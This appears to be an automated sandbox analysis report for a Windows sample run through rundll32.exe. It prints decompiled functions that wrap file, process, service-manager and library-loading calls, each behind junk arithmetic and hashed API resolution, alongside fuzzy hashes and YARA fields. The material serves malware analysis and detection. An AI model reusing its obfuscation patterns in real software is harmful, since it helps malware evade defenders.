0x0019c738
0x0019c751
0x0019c762
0x0019c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0019C762

Strings

/O, xrefs: 0019C6E6

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 950002c9b74ddbbc0ce14b929a60673ecdac6a6ddf586db25fb66adeabd2b9cf
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 2F1122B290122DBBCB259F94DC498DFBEB8EF15714F108188B90962210D3714A659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00191000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00191000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0019602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001A07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00191006
0x00191009
0x0019100c
0x00191011
0x00191016
0x0019101d
0x00191026
0x0019102d
0x00191034
0x0019103b
0x00191047
0x0019104f
0x00191057
0x0019105e
0x00191065
0x0019106c
0x00191073
0x00191077
0x0019108b
0x00191096
0x0019109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00191096

Strings

[, xrefs: 0019103B

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: ab2c8b561ac386db51366fac722d209ea3f29d137226b33aa1bf6e8ea59da18c
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 2D015BB6D01308BBDF04DFD4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00194859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00194859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001A07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0019485e
0x0019487a
0x0019487d
0x00194884
0x0019488b
0x00194892
0x0019489d
0x001948a0
0x001948ad
0x001948b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001948B7

Strings

[, xrefs: 0019488B

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: c0c6c26c9421ca8695cc26e860af3e117419747d9c69ac0a16e0c747bfe97c5f
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: C2F017B0A05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001A4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001A4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0019602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001A07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001a4f80
0x001a4f81
0x001a4f82
0x001a4f86
0x001a4f87
0x001a4f8c
0x001a4fa5
0x001a4fa8
0x001a4faf
0x001a4fb6
0x001a4fc7
0x001a4fca
0x001a4fd7
0x001a4fe2
0x001a4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001A4FE2

Strings

{#lm, xrefs: 001A4FC2

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 7d63cc42925a7e108a773b86456608bfcd87343c0528ed15c9f106cce1e99e80
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: BAF037B081120CFFDF04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001A976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001A976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0019602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001A07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001a9772
0x001a9773
0x001a9778
0x001a977a
0x001a977b
0x001a977e
0x001a977f
0x001a9782
0x001a9785
0x001a9788
0x001a9789
0x001a978c
0x001a978f
0x001a9790
0x001a9791
0x001a9794
0x001a9797
0x001a979a
0x001a979d
0x001a97a0
0x001a97a3
0x001a97a6
0x001a97a7
0x001a97a8
0x001a97ad
0x001a97b7
0x001a97c3
0x001a97ca
0x001a97d1
0x001a97d8
0x001a97df
0x001a97e3
0x001a97fc
0x001a9816
0x001a981d

APIs

CreateProcessW.KERNEL32(0019591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0019591A), ref: 001A9816

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: c324edc01aec3327bef67e8b7c0e47d232d8761267b1378d09fc109f4f1da67d
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 3111B372901148BBDF1A9FD6DC0ACDF7F7AEF89750F144148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0019B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0019602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001A07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0019b569
0x0019b56a
0x0019b56d
0x0019b572
0x0019b574
0x0019b577
0x0019b57a
0x0019b57d
0x0019b580
0x0019b583
0x0019b586
0x0019b587
0x0019b58a
0x0019b58d
0x0019b590
0x0019b593
0x0019b594
0x0019b595
0x0019b59a
0x0019b5a4
0x0019b5b8
0x0019b5c0
0x0019b5c4
0x0019b5cb
0x0019b5d2
0x0019b5d9
0x0019b5e6
0x0019b5fd
0x0019b604

APIs

CreateFileW.KERNELBASE(001A0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001A0668,?,?,?,?), ref: 0019B5FD

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 160ad2793d4dd85ba4233dbdd1e58f6ab26938cf4719f1c2bd262cf754553469
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 5C11C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001A981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001A981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0019602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001A07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001a9821
0x001a9822
0x001a9825
0x001a9828
0x001a982a
0x001a982c
0x001a982f
0x001a9832
0x001a9835
0x001a9836
0x001a9837
0x001a983c
0x001a9855
0x001a9858
0x001a985f
0x001a9866
0x001a986d
0x001a9874
0x001a987b
0x001a988e
0x001a989b
0x001a98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001987F2,0000CAAE,0000510C,AD82F196), ref: 001A989B

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: d232160f990c85daef99c74cc75094ba43b26514ea119e1ce5a9da2f8907f6bd
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 3B019A76801208FBDF04EFD5D846CDFBF79EF85310F108188F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001A7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0019602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001A07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001a7bf7
0x001a7bf8
0x001a7bfa
0x001a7bfd
0x001a7bff
0x001a7c02
0x001a7c06
0x001a7c07
0x001a7c0f
0x001a7c1d
0x001a7c25
0x001a7c2d
0x001a7c31
0x001a7c38
0x001a7c3f
0x001a7c46
0x001a7c4a
0x001a7c5e
0x001a7c67
0x001a7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001A7C67

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 5bcaaae1d98bc5e0d9c91331dd755d6fd8b8d8cfcf2a0b62f34b80abd2a244c5
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 460128B1901208BFEB09DFA4C84A8DEBBB9EB55314F208198F405A7240EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0019F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0019F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0019602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001A07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0019f662
0x0019f663
0x0019f665
0x0019f668
0x0019f66a
0x0019f66d
0x0019f670
0x0019f673
0x0019f677
0x0019f678
0x0019f67d
0x0019f687
0x0019f693
0x0019f69a
0x0019f6a1
0x0019f6a5
0x0019f6a9
0x0019f6b0
0x0019f6c9
0x0019f6d8
0x0019f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0019F6D8

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: d15ea89924c073b6ee76cd2d96c29146ed12ff680c9925073a92c1e929249478
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 7101E5B6901208BBEF059F94DC468DF7F75EB15324F148188F90462250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0019B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0019602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001A07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0019b6f3
0x0019b6f8
0x0019b702
0x0019b70b
0x0019b712
0x0019b719
0x0019b720
0x0019b727
0x0019b72e
0x0019b747
0x0019b759
0x0019b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0019B759

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: c4912db1606f5fd5b25834a2b729628cf89fa9eecfd8389e67087412749fe5c1
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 990128B6941308FBEF45DFD4DD06A9E7BB5EB18704F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001AAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0019602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001A07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001aaa3f
0x001aaa40
0x001aaa41
0x001aaa44
0x001aaa47
0x001aaa4b
0x001aaa4c
0x001aaa51
0x001aaa5b
0x001aaa64
0x001aaa68
0x001aaa6f
0x001aaa76
0x001aaa8d
0x001aaa90
0x001aaa9d
0x001aaaa8
0x001aaaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001AAAA8

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: aa408e26516c4062f4e260a6d92ea8f993d71621a31aff449e4a6926d714d641
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 2FF019B590020CFFDF08DFD4DD4A99EBFB5EB45304F108198F915A6250D3B69B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00195FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00195FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0019602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001A07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00195fb5
0x00195fb6
0x00195fb7
0x00195fbb
0x00195fbc
0x00195fc1
0x00195fcb
0x00195fd7
0x00195fde
0x00195fe5
0x00195ffc
0x00195fff
0x00196006
0x0019600d
0x0019601a
0x00196025
0x0019602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00196025

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 898b6b647c8a7637f0a4b3ab182188e0c311b541ec7df80bdde1c1f908a05121
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 09F04FB4C11208FFDB08DFA0E94689EBFB8EB50300F208198E409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3068 Parent PID: 2932 rundll32.exeCOMMON

Executed Functions

Function 00232959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0023602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0023295f
0x00232964
0x00232967
0x0023296a
0x0023296d
0x0023296e
0x0023296f
0x00232977
0x00232985
0x0023298a
0x00232992
0x0023299a
0x002329a2
0x002329a9
0x002329b0
0x002329b7
0x002329bb
0x002329cf
0x002329dc
0x002329e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC

Strings

<^, xrefs: 00232977

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0023602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0023c6e1
0x0023c6e6
0x0023c6f0
0x0023c6fc
0x0023c703
0x0023c706
0x0023c70d
0x0023c711
0x0023c715
0x0023c71c
0x0023c723
0x0023c72a
0x0023c731
0x0023c738
0x0023c751
0x0023c762
0x0023c768

APIs

